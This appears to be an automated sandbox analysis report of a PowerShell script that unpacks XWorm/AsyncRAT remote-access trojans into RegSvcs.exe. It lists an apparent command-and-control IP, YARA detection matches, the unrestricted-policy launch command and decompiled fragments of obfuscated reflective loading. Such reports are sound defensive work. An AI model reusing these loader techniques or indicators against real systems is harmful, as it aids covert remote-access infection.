            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: powershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1441536967.0000019B0AB0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.1462732194.0000019B1A8CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1441536967.0000019B0BA56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            System Summary

            barindex
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B4610831_2_00007FFB4B461083
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_014963403_2_01496340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0149C2D83_2_0149C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0149B5983_2_0149B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_014984B83_2_014984B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01495A703_2_01495A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_014957283_2_01495728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01490FA03_2_01490FA0
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0aa80e98.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.1441536967.0000019B0B50D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.1441536967.0000019B0A8A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, 75nEg0zZR0dHe.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, 75nEg0zZR0dHe.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ocdWY4uta2L6F.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, 75nEg0zZR0dHe.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, 75nEg0zZR0dHe.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ocdWY4uta2L6F.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, ZIg8Qqo0jZuX2XOx4xLqAhf47oWpoNvAaxwAcDK84nM8ufFMnbxFnWhlwugUCXkJBxJUgDoiGL4JxxlL3N6MWF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winPS1@4/5@0/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\pWbxsRP5Z5tLW4V1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1wqhwie.s1e.ps1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: rZqmN4mRco.ps1Virustotal: Detection: 31%
            Source: rZqmN4mRco.ps1ReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH._7ou4q3URxUtrcBhAksV8MILst8vvfhGZzz84cTowdPeJNJqpazaC0zcplhKSCF9TGZGal9qwtbeNZDXuM4ysc7,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.B5vObioagoHeuBETToqXO7c4SBvzgegJ2rVxzrn97Z01VyClBh4RfVnBpn3uLZmwBfvDkA7hA0zjL4bYk2F9Lw,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.MGHflsToeaIGYe2QlJGLifoJfKHFMzr3e7F5gXl32IYYefKteaV3QAP8fQuyq1nSYPUyb4dRKPWQTfFJrBKDJn,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.JavtZpWbEUzyaboWUx5EzFRMnopkNEbRbaMCyBm6SCxx4PxjVvD0SD2eCoxY6CvuIPhM1bDKYzUwSKBPVNSu3Q,_75nEg0zZR0dHe.a5l48OPDiZ3ML()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N6aiy2oVGGWRy[2],_75nEg0zZR0dHe.UcVmBdslgVk5f(Convert.FromBase64String(N6aiy2oVGGWRy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH._7ou4q3URxUtrcBhAksV8MILst8vvfhGZzz84cTowdPeJNJqpazaC0zcplhKSCF9TGZGal9qwtbeNZDXuM4ysc7,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.B5vObioagoHeuBETToqXO7c4SBvzgegJ2rVxzrn97Z01VyClBh4RfVnBpn3uLZmwBfvDkA7hA0zjL4bYk2F9Lw,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.MGHflsToeaIGYe2QlJGLifoJfKHFMzr3e7F5gXl32IYYefKteaV3QAP8fQuyq1nSYPUyb4dRKPWQTfFJrBKDJn,Y4CHbM3u3QZQFLNmLXl5J1IOUqF8AZyf8QLrB6P2HLa1KOJ67eNMH.JavtZpWbEUzyaboWUx5EzFRMnopkNEbRbaMCyBm6SCxx4PxjVvD0SD2eCoxY6CvuIPhM1bDKYzUwSKBPVNSu3Q,_75nEg0zZR0dHe.a5l48OPDiZ3ML()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N6aiy2oVGGWRy[2],_75nEg0zZR0dHe.UcVmBdslgVk5f(Convert.FromBase64String(N6aiy2oVGGWRy[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: RocT7i11N77Uf System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: RocT7i11N77Uf
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: ZUmB24n464ntiQrflcihkDyPco81l8Q7DbSzDtnPgle6J6wZ28XmQUOLWjnlfqlyYqNcIrx System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: RocT7i11N77Uf System.AppDomain.Load(byte[])
            Source: 1.2.powershell.exe.19b0aa80e98.2.raw.unpack, Li2ULm0i6cihVZvstQs9NHfw10142ZKYYqXeHVfCXRc9sy3TG9OSRowOKVpqVb8H7iWhziH.cs.Net Code: RocT7i11N77Uf
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B395B71 push ebp; retf 1_2_00007FFB4B395B72
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B39D108 push 00000048h; iretd 1_2_00007FFB4B39D10A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4B3900BD pushad ; iretd 1_2_00007FFB4B3900C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01498080 push eax; iretd 3_2_01498081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01494CC8 pushad ; retf 3_2_01494CD1
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, b4uun3ISTXKnf.csHigh entropy of concatenated method names: 'YCjMUCUaS1W51', 'nBYZp8mEKNdCM', 'A0fHqAYUq6yHF', '_1mVdS59RD9WRXjpk4dgLoY55DRM5wYkWRMGMMurlj3LIOgyP', 'fHMQFoqEOaRpZM5LGroxVJm37fqi9jUrbA6e0tMx0g2V8mYW', 'LoB5UwuYY5RTRpo7KYVsQo0M18w3Nqjvx6hFEJtWrmEhpNS8', '_8xzyi24VkTi5m5Gsy7XUUolTzE6ThsmXs6bUc1FmIJiIWf1C', '_0fb1PXYa6kb1Rh7XSfKSHk6h0u9Dpwhkn0aPYGvFcLJ9j5gx', 'muNz9fBp8MEGjEaAaR4gHkqhVUn1c7430siPvrb9kzSiFIcm', 'br3It0Vta53HcAKawwe4bhthaz6XVj4dQqIhe3SzkIF6mbdR'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, Okx2cEcCTYefVQm6EymR3DAHXaTSljZM45uWUuKfmTQXlObkYx2hI.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'qhoRWWDGbIaBYf1xlc2ObtVWJaKjgV1', 'DymWxUA0Gzkq60kzVxmAsWvR6nPAUbA', 'VRGwbt4QosOEYZDJMW6oiZAv0pO17cG', 'yUA6AUHSQfBMMR68GOUobZVEBz10NVn'
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.raw.unpack, 6jI32o4ws06OX.csHigh entropy of concatenated method names: 'RaiFrYHEhVkGS', 'hx6hnTTFdwvcvMmU5tfd16J2MYSLJ0eJ6OI49uozqUzfAV2hp9pL3WXmxeqoyAR', 'cNGApf86khPqX7UFOcOQ1vxse4iSyACnzfVfGwGsr2VBKXVV9zlAAxqefX2ESAr', 'A59evJghrlNxzbqc6Ps2fGGXCHRposxsPG3o30QgIEcDchw2DXYQuOTjARh5Abl', '_6zBH6zRaU2H1LVlnglmQDC83mL96YyuygQvcn37k0CYYQ5ofHgMOFoWn6791yKg'
